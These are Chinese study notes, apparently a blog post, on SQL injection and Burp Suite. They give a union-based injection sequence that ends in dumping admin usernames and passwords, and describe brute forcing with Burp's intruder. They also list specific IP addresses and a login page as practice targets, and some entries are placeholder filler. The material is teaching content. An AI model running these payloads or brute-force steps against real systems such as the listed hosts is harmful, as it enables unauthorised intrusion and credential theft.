SQL注入与burPsuit工具介绍

sql注入原理
1. 原理：用户输入不可控，用户输入导致了sql语义发生了改变
  1. 用户输入不可控：网站不能控制普通用户的输入
  2. sql语义发生变化：
2. 动态网页介绍：
3. 网站数据请求
  1. 脚本语言：解释类语言，如，后端语言php/jsp/asp/aspx
  2. URL的构成
  3. 数据请求的方式
    1. GET:随着URL传输，传输数据量较小，不能传输铭感信息
    2. POST:在请求正文中传输，传输的数据量较大，可传输任何信息
4. sql注入的类型
  1. 按数据类型分
    1. 字符型
    2. 数字型
  2. 安数据传输方式分
    1. GET型
    2. POST型
5. sql注入发生的位置：
6. 演示网站
  1. https://rimovni.exeye.run/mefe/login----某CTF平台
  2. http://139.155.224.134/grade/
回显注入
1. 回显注入的原理
  
  sql注入后的结果会出现到网页页面上。
  
  核心点就是union
2. sql语言回顾
  1. 增
    1. INSERT INTO table_name VALUES (value1,value2,value3,...);
    2. INSERT INTO table_name (column1,column2,column3,...) VALUES (value1,value2,value3,...);
  2. 删 DELETE FROM Websites WHERE name='Facebook' AND country='USA';
  3. 改
    
    UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value;
  4. 查
3. 回显注入的流程
  1. 找数据输入点
  2. 找有数据输出
  3. 判断注入类型使用单双引号、注释符判断
  4. 确认漏洞是否存在：1' or 1=1 和1' or 1=2
  5. 判断列数 1' order by 1
  6. 判断回显位置 0' union select 1
  7. 找当前数据库 0' union select database()
  8. 找所有数据库名0' union select group_concat(schema_name) from information_schema.schemata
  9. 找所有的表名：0' union select group_concat(table_name) from information_schema.tables where table_schema='grade'
  10. 找所有字段名：0' union select group_concat(column_name) from information_schema.columns where table_schema='grade' and table_name='admins'
  11. 获取数据：0' union select group_concat(username,'~',password) from admins
4. 特殊的库表
  1. 数据库的结构：库--->表--->字段（列名）--->数据。
  2. 特殊库：information_schema----->整个DBMS数据库信息
    1. schemata--->存有所有的库名 schema_name
    2. tables------->存有所有表的信息 table_schema 库 table_name 表
    3. columns---->存有所有字段的信息 table_schema 库 table_name 表 column_name 字段
burpsuite
1. burpsuite的安装
2. burpsuite的功能介绍
  1. 专业版含有漏洞扫描的功能，社区版没有此功能
    1. 破解版不能保证自身电脑的安全型
  2. 核心功能：拦截数据包，并且篡改数据包
    1. proxy:拦截数据包
      1. forward:提交数据包
      2. drop:丢弃数据包---数据包不会到达服务器
      3. intercept:选择burpsuite的工作状态
        
        on：处于拦截状态
        
        off：处于不抓包状态----数据包直接提交到服务器
      4. action：调用数据包处理工具
      5. 数据包状态
        
        raw:完整的数据包
        
        params:传输的数据
        
        header:请求数据用表格的形式展示
        
        hex:16进制展示底层数据。
  3. HTTP history
    1. 展示拦截数据包的历史信息。
  4. options:
    1. proxy listeners:选择代理连接信息
      1. add:添加代理信息
      2. edit:编辑，修改代理信息，选中需要修改的代理条目------>点击edit----->弹框中修改IP或端口
      3. remove:删除代理信息，选中需删除的代理条目---->点击remove
    2. intercept server response
      
      作用：开启或关闭响应拦截状态
  5. repeater
    1. 作用：数据包重放。
    2. 用处：
      1. 重放攻击
      2. sql注入\文件上传\XSS等绕过
  6. intruder
    1. 作用是暴力破解
      1. target展示出的是请求的服务的信息
      2. positsions:选择暴力破解的点于破解方式
        
        sniper:破解一个地方
        
        Nattering ram:可破解多个地方，但破解的点数据一样
        
        pitch fork:可破解多个相关性的点
        
        cluster bomb:可破解多个点，且多个点之间没有任何联系
      3. payloads:设置字典
        
        payload sets：选择为那一个破解点设置字典
        
        payload options:放置字典
        
        paste
        
        load：加载字典文件
        
        remove：删除字典条目
        
        clear:删除全部字典数据
        
        add:手工添加字典
  7. 啊实打实
3. burpsuite数据包操作
  1. 开代理
    1. firefox开代理：菜单--->选项--->高级--->网络--->连接--->设置---->手动配置代理
      
      （浏览的代理于burpsuite中设定的代理的ip源端口要一样）
    2. 阿斯顿
  2. 大苏打
4. burpsuite暴力破解
  1. 暴力破解的原理
    1. 枚举-----试一试
    2. 简单---原理操作简单
  2. 暴力破解的操作。
    1. 安装插件：extender--->Bapp store--->install
  3. 暴力破解的难点
    1. 效率低
    2. 对有效字典的要求较高
    3. 对算法要求较高
    4. 对设备要求较高
  4. 暴力破解优化
    1. 信息收集---社工：http://221.237.108.18:8090/tyjgl/login.jsp#
    2. 多线程

巴特西

SQL注入与burPsuit工具介绍

最新文章

热门文章